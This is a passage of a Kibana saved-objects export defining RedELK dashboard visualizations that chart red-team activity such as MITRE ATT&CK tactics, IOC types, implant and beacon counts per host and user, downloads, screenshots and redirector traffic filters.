"uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 115], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 117], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 119], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 121], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 123], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 125], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 127], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.3", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 128], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.3", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 130], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 135], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 137], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 139], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 141], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 143], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 145], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 147], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 149], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 151], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector 